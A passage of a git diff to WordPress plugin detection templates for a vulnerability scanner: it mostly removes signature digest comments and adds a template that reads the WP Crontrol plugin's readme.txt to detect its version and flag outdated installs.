b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034e47f55df28d3cc395ff3994d4897692e075c01a100eb0a9e751d033c64cc7e022100bdc15fc9f9de350832157a7ee2b998fd0d3b4896d048dcfbabddbfffb288050b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 3464450509a..61a793edf72 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203055ba348257950a08f743d4b8ed4fa68ecae5258a1a3a50f1d9b64e67d64a600220792b43bba2b9907de0116b224403c9c236ca89fa8f41eb497ddc4bb147e0b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 6edbbef6396..0da88d5d3f7 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c7cfbeb34e7c4058e4d2e433c79e8c8a1eec1009df9992c4042a9bac388011b022074d0c36b4d6ebc4cd43f2b2bd966e04ecbf997a667a12d8eabd54695c7f86eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 755e73a9ffd..2b29428cf10 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205538a8e5786fcae19b0e505e0efbdcbae34fe6a46116b02ef8ab52108fd45f6602206332df2cefe682fbabba3bb3a0a58a45970d880db84c4692168c56071e1571cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 48cedfb5dd2..181e619a7cf 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab8efd55600a6feb97f0bff3b2695b2a82f7300e542d2e3835cfb4e76a497573022100abbd747562da9c053bfbec900a5796d0419dfe23c77c4a556265834fbd2f4c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 54b9dbfd62c..8164eb44838 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e900f42129cdd40e5ba9bec8fc845392ea4149ca1de868a0f49144b8ac0491e702201ba0932284d21dc009081dd43b0274a889bad4c029f308fda58a114403f67781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 79a0ba45995..59554defdfc 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025682fb39ca2080c465ef246fcca5bf21f27449c66e356f4afc7fcbb5d0f27d9022100c77ccabbce4f82aee21f6e9128a05df2b48a658d4c437ccbb81cde37e909b8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 1cce1a6482c..350fd9436b4 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3c115ad1b6bc865e4af4702ada3674abe546751fa444d1456c2be37a301febe022100c4507da89c53b586fca773a26421f641c0e81837e777257c11e38b7ebc7f47fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 51a3670296a..2ae6bafbbab 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e168b89f7f3017f78ab9f95e8f8f44995ec31fc063cb36efb1c31b65754b0793022027ea98781d3f4b8c552455547e6d97bb13cf7d2e7421b0d5daeed110d8997770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 63b34616c22..d0dc8d92bb9 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008450cb3d227ec4e59c05583c6ff608f40cca5c65a7b56ea355cc3a42f1e4737a022100ccfc7227c7bee39e5ed234b74327e34bfb97b4da7c8ddbac5a396c8c16b9eae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cbbe6b7d5bc..c49bbc2b6d1 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4b71c3bdb87853c92c02fb95a90c02c1b52b6ff19a10893b28aa8be88bcf9da0221009b2127b546ab9396f54090cb741bca6744889f145ba5c875332f45e6e8f554fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 2ffd4ab2d9e..27586cbd9d1 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f1fc1ec179b8f103c197708466e876043d01701734007023d10663f69eda10002204ddaa9a8e2c56acad4622e11c1a21612c7e14cacff2a713ab89034a98b8a58b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 23223eb3686..946272f0a90 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206352c15639aa03b2a1b0e4175e5e36be014131f350e4732d1ba5ff09e77f882f022100d9cc00c400eb37dd7cd3c73eb5ec6c2473e75ea79d2cad7cac581fcc01b34a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 8dd23fc1ec0..aa297068720 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e6b3455b9a4067bac9e177492e003d96a76efe26c257360bb7c0e58a9fe24ad60220387aeddc681702fc5928821a4c6ebe648d755490be49af59fae2a6702895d0d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index d99d72e3b7b..290d53ab7ed 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f2385cd16916bd9272cdaa3110d0d9924790b97ecd7fbc82eb3e243ad64f7450220684f58ceac840ff56a87fd34907d4df7b14c3e6c865ec41a74268eea14d488cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f8b12a99a1d..f7c9ef9b1f8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e53b6bf3d1a47c96dbcacf1600910e815978dacba61cb162c36de87b9be3b80d022064deea85fae7d961718b7aa7a74f6208fdd4eb1a4465afbf1a5b850159866284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 27661e088e6..f1c16275a2a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd7ecf3ce26da302c91d4753eee96f597b4014c5f2bf8015f42d0537e3815d01022100a063674b8c59a511ea08057a0b6eca9c77ef73f781d931e99898fdee3df172eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c4348a5c99b..fc072e19d8a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b0d61d63a56586e6efa862c03cc72df0a4c282dd47c2596a9db1a416fdc7a3402203b811de7eab61537ed67ede0c8adecafdbfe52ceffbe5fcb7dfe09e1ae09388e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index a93beeeceac..da9df0e8a5c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040711480084a93ba22eb1541db54de58a0972570b7150695d258f294ca05c55902210084fa094a0e92fb6f2da40f10015478c9c1adc36562d3dfcbc55f44ef6cb234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index b16859adb04..f8113d97506 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220312ad6709cddcbf96208dc1e5b534d3972eee20b78045c2cecdd493fd3c4cf770221009c1b7af188df7f0c7431d02d8ab32fc9f1667a8e295b51e86376589ac171d7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6d14910d5eb..5f80282ab22 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097c53d10d1c8bec404c9ba48eda64528432d61703c9e1b8dee4621ca8e0e7e26022069ba4262f9924757d8881ab03af7e6c3148968c9f6666ba3765ce573ec31a754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index bbc5beffa46..5725d5bb3f8 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050cd3ff6bae166fe13287482302834e9aebaa90ce864fefc950644e6b37205f2022100fb4e889a5cb3349894dd5e0be8d3eb6f25cb1f6377c7a9b97cc5ba5e4d37b5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 3a5b468aecf..f67a8bc18a8 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220640f01ffe2f57fa6404d9841632e5052d3658f4d344bccb8a7d83ede8f285319022100e128f6a42eb9f602478f28fc40b0493c60ec522d05ebd3349e1ba5eeecfb0413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml new file mode 100644 index 00000000000..a773829b7d8 --- /dev/null +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -0,0 +1,48 @@ +id: wordpress-wp-crontrol + +info: + name: WP Crontrol Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-crontrol/ + metadata: + plugin_namespace: wp-crontrol + wpscan: https://wpscan.com/plugin/wp-crontrol + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-crontrol/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/wp-crontrol.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 0ca9c2dc827..b9bd4be0a8b 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204884b4363520d673abd8639b6785dc1f6610405a9692c1f31320948c4bbf87b2022051e5ee53a2d9294649756b8698c1c959b18631df17811778523799fca3c15810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index e812464596f..bece4ce486a 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da74bbd37026d5cd063bd2d87c78c3a629a04ba4a33f7b7ade0f0fcefa3da5400221009cf140458d03ec33fe8923a350fe00ce48073fb144cbac680c21b9694eb01ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 33a39b64b39..138b0aa9a69 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fd43dbc93360a51cc2a564d9ecd71ab3758c21dc4a478c22ad8f6cedcd5c114022100ad802f0d4d9e753554590909f1804df1a3a566a7b39b670c164ea65db9aa87a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 5314ea40df5..68bf71bc839 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ebdc3d8b7d35808d2444a5285d56c860763f57714b3c3fe4c91bd0f3259ea74022100a4857731f7e6c83914ebecde533e4b9b5f749eac7254d1560ebc229d06e03d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0c0969c565d..10dad2d2fb8 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea68c91c8830eb8dbaf647993731d68b932c0609f8795182c56cf277bdea0de5022100f71936fa98b175c5b374d77a75ed1c685635b90b96ea237f327c556deea64192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 5a4cd5564fa..e9efe6fb53a 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f85aa1d32ce9f0ba00add38a888bd198c4558b23dec6e0a51f988daf477d9243022100f0120f47540596c487de15c2e35e7679f3408664a016461a761446f929e1c9f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 5cbb7d535a5..c3d10f01359 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cad53f3b3e6bfec34e3444cb3af249ae68728edc4328ff4cf14f8cbf75a15440022100bbb815bd4cba8077aeca58f4a4f67ae691816eb22d0744f261c774c415d23fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 16752dccf44..4a8bc6b75c7 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068c0de38750dcdb94e771ec1770d6688de688c80fd559528d3d9230c29db8d250221009df9528d539b814dce0a82227738e0dbc33b213df5ef0237bc0ae4231205e435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 94e42f526c2..d2c74355bd7 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c2a2eb5025231d4b690840b146fb34b60ffa55b5b86f8b439702057805ed3670220649f409630965c3c379d3fc03c7f7ce0046ecaeaa4514d3775abb9f977b88b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index db0c84ea047..94b8494b08d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071166a051005f218f2cd445d3261588472d2c99a7b3a42ef3a7fcd19c507738202205215b0035c6610ea908c54da825fb41ab4afdbfb4dbb38b21afbd124abc78195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index a46072bcddc..108aba79e99 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c662b200972c4730bac3abe62c83116ecf270217c1b521b4ac4f1b15083c22e4022100c630fb06096715824cb19c28a65aa5699a486b2965a02507afb43001ba3d1d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 141cbe93d01..f6f6bf55667 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220439e8bd3d1b6bd98414a3714fcc4bd5d732b8135c803ea7ec34be98fc1de4956022100d647bd858801603516b9aeebc66c3fb07666203f4ffb8b33da236e3a50403b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 12d2b56effc..483cb7cac74 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f7b82f7e6a9c6f24b940f2bfaf91dcc514f9aaa62ef8025a3166d6e49190fb002200f8a3ec15305abfbd4b358faef563de58eac9394619fcf560d644861006032b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index d467105e1fe..a132c98df49 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b0470b762199b905e27020511d55d5b1eb83627583361773cc53cb7951f18b4022100b0e02d1bd6fe83a34a46d18034d8d5cf5bf83eaef62747227002c73fadb4c45c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 6eda5f66db0..135bbee0467 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d78ec5393297257820ed021a2b2c32567175d0ac9687fc72fd3deb581cc590a60221008786a22ee6a36f2c62518a446106e25d5e3a08e578e3b9e1304ad7a9dafe3e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 30b0c571a64..5b690d96c0d 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021560ac33b4b82f917023d10fdde395e8d65cacc138880cadf6f929bb499c934022100f68e31a9703453a74ca957d3c88c32f9402644e825d60930b33d08bcb20b9227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index dc648e15bcf..16c7d6cff55 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bdc171bb7d9ff7065e3ecdb8f06c1f222cebb6a4d8e878edccf8a8c6a58eb6b022100c40817ea26c76623c77f50e5d47eaef40250204aa87bcab3d2a9b98420671e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index e1d0b579fd5..ab099f357e3 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022046393a7093b0a14ef2743dcd94e62d176af17b29de6c8026645e80cf5f4a7789022100e6d7f7cf4a8fb597f3593290f3dd9b8dc11bd112ad90becc19e9298e498d2898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 629439acb59..ad0b8f8fed6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0d431f8885f905dafbf76fe1444299af5d615d2eabdbd7f983e52006be33b5102206c047f984f838490f42a21dc1fd88b6d33127fb4a2770bd156e3ac409d669930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index f033252e949..aaaf0f9a172 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aeb3774ea370a73fe2b7a162d13df7f73b25d6fa761ca76f6b853df55e2d0ac502200a0c16c4d7c13e0039e10cc80eb20bbce9a0a96a01009874872292b68cd6f289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index e9eddc4c395..f943c7afebd 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bb300e7116c50b114c0aacb6a086647b173da0e019fa4cb56ca389815dffe6c022100c6f9d68dfea1b208b03edbecb6a1865805a73ad8c9eeb89c93759868e65cd04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index ea0789c4e4a..062e5c85b49 100644 --- 